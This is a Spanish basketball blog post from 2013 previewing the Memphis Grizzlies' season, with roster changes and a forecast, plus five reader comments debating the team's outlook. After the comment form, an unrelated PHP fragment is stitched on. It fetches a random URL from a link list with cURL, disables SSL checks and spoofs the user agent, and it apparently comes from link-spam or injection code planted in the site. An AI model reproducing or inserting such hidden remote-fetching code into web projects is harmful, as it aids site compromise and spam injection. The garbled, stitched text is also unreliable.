Memphis Grizzlies: Nada está escrito

28 de September de 2013 por TheDeerHunter

Venimos de la temporada más fabulosa de la historia de esta joven y humilde franquicia. Consiguieron su mejor resultado histórico al alcanzar las finales del Oeste y el mejor balance victorias-derrotas de su historia en temporada regular, fueron el mejor equipo defensivo de la liga, Marc Gasol consiguió el premio al mejor defensor del año y apareció en los dos segundos quintetos ideales de la liga, Tony Allen formó parte del mejor quinteto defensivo, Conley del segundo… Todo esto el año en el que nosotros, avispados que somos, ya le habíamos puesto techo al proyecto en segunda ronda y eso antes de conocer la salida de Rudy Gay.

En casa del pobre las alegrías no duran mucho y la imagen espartana que es seña de identidad de la franquicia viene motivada por dos causas. La primera es que es cuenta con uno de los mercados más discretos de la liga (la segunda franquicia con menor interés televisivo) y la segunda, consecuencia de la primera, la austeridad a la que se ciñe la gerencia. Sólo por causas económicas puede entenderse la no renovación de Lionel Hollins, como también la política de fichajes en un año que debería haber sido clave para soñar con objetivos mayores.

Ante este panorama es difícil apostar por que los Grizzlies vayan a continuar alcanzando nuevos hitos o incluso repetir la machada anterior.

Sin embargo, uno analiza detenidamente los movimientos efectuados y, llamadme insensato, pueden cobrar sentido dentro de las reglas internas que rigen la lógica de la franquicia. La promoción de David Joerger, asistente de Hollins, puede terminar siendo una opción continuista barata. Se dice de él que es el verdadero arquitecto de los sistemas defensivos de los últimos años y podríamos estar ante un nuevo caso Thibodeau. 

Por otro lado, mantienen el bloque que les ha llevado al éxito tras renovar a Tony Allen por un precio razonable (y no era fácil) y han mejorado el ya de por si potente juego interior con una ganga como Kosta Koufos (3 millones). Además han fichado a un tirador fiable como Mike Miller por el mínimo. Quedan por debajo del impuesto de lujo y tienen la opción de tirar el all-in ante alguna buena oportunidad a lo largo del curso. Si acaso podemos calificar de fracaso el efímero fichaje de Fab Melo a cambio de Donte Green.

Así, los Grizzlies saldrán a pista con un juego interior de máximas garantías, con la parejita Marc-Randolph causando estragos como acostumbran y con la opción de mayor rotación y descanso para ellos, de cara a playoffs. Ed Davis, Kosta Koufos, Jon Leuer parecen excelentes recambios. Willie Reed parte de un contrato no garantizado y tendrá difícil hacerse hueco.

Por fuera intuimos el paso a la titularidad de Pondexter, junto a Allen y Conley, más una mayor profundidad que el año pasado. Bayless ejercirá específicamente de point guard y la veteranía de Prince y Miller no tendrá necesidad de quemarse de minutos. También llegan los rookies Nick Calathes y Jamaal Franklin, que está por ver lo que pueden aportar.

En definitiva habiendo sido tan conservadores mantienen intacto su potencial y se dejan alguna carta bajo la manga por si acaso. No había mucho más que pudieran hacer para garantizarse aspirar al anillo. Seguirán siendo un equipo puntero defensivamente y muy incómodo en los playoffs.

Altas: Josh Akognon (DAL), Nick Calathes (N), Jamaal Franklin (N), Kosta Koufos (DEN), Mike Miller(MIA).
Bajas: Darrell Arthur (DEN), Austin Daye (TOR), Keyon Dooling, Donte Greene, Tony Wroten (PHI)

Quinteto: Mike Conley, Tony Allen, Quincy Pondexter, Zach Randolph y Marc Gasol.
Sexto hombre: Jerryd Bayless

Pronóstico: TOP-4 del Oeste (52-30). Segunda ronda de Playoffs.

Comenta

5 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Tantas veces comparados con los Spurs hasta en esto de las predicciones se parecen a los tejanos.Cuando llega el momento de los análisis previos a la temporada uno siempre se posiciona con esos que dicen que su mejor momento ya pasó y comienza el “declive”.Se dijo hace dos temporadas,el verano pasado y a día de hoy,con el cambio en el timón y con esa política de austeridad tan poco ilusionante,casi que también.

    A pesar de Miller -que todos sabemos el rol que tuvo en Miami- no parece que hayan solventado esa carencia de tiro exterior tan acuciante,así que este y demas características de su juego permanecen invariables.El rival incómodo que siempre te pone las cosas difíciles.

    En cuanto a vaticinar posición creo que tienen la división más complicada con Spurs y Rockets muy fuertes,unos renovados Hornets y los Mavericks que pueden tener el día tonto en cualquier momento,yo les pongo en PO seguro pero 6º de conferencia.

      Citar

  2. Denise dice:
    #2

    Creo que el SF titular seguirá siendo Prince; y Pondexter será junto a Bayless las referencias ofensivas de la segunda unidad cuando los titulares estén descansando.
    Analizando el roster, por dentro van sobrados, teniendo posiblemente una de las 3 mejores batería de hombres altos de la liga, pero por fuera la plantilla está muy desequilibrada. De Calathes y Akognon no espero absolutamente nada, en caso del griego, siempre me ha parecido un jugador sobrevalorado. En defensa, es un buen recuperador de balones y está atento para intuir las lineas de pase y generar robos, pero en el 1×1 va a sufrir bastante en la NBA. Y en ataque es un tirador pero no metedor, su consistencia es nula y puede meter triples pero a base de tirar.
    Viendo, que es el último año de Randolph y que la pintura con Marc, Koufos y Davis está a buen recaudo, reforzaría la linea exterior buscando un traspaso de Zach por un ala-pivot mediano y un buen exterior capaz de generarse su propio tiro y anotar en momentos calientes, por ejemplo un Zach Randolph por Marcus Thornton y Jason Thompson creo que sería bueno para ambos equipos.

      Citar

  3. Denise dice:
    #3

    Ah, se me olvidó el pronostico.
    Al igual que Ruxxión, los veo entre el 6º y el 8º, en ningun caso en el Top 4, incluso no me llevaría las manos a la cabeza si se quedasen fuera de playoffs. El Oeste este año es bastante duro.

      Citar

  4. Esteban dice:
    #4

    mientras un equipo defienda como lo han hecho estos grizzlies en los ultimos tiempoes, siempre van a tener chances

    seguramente estaran en PO, pero no veo mucho mas que una segunda ronda como mucho

      Citar

  5. rumbero dice:
    #5

    Coincido con el análisis. Para mi van a seguir siendo un equipo muy peligroso con plaza fija en PO y que ahí se van a volver en un rival aún más incómodo. Como dice Esteban un equipo que defiende así siempre va a tener opciones. Creo además que el tema de la falta de tiro exterior queda más remarcado de la cuenta por la eliminatoria contra los Spurs donde se los comieron por dentro, algo que pocos equipos han conseguido hacer hasta la fecha realmente. Volverse loco con incorporaciones que modifiquen demasiado la base del equipo podía ser peligroso. Davis y Koufos mejoran la rotación interior, Allen a ese precio es un chollo, Miller y el mayor protagonismo de Pondexter vienen a cubrir esa carencia exterior en determinados momentos… y todo esto sin tocar demasiado la filosofía del equipo y sabiendo las limitaciones que suele tener la franquicia en el mercado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>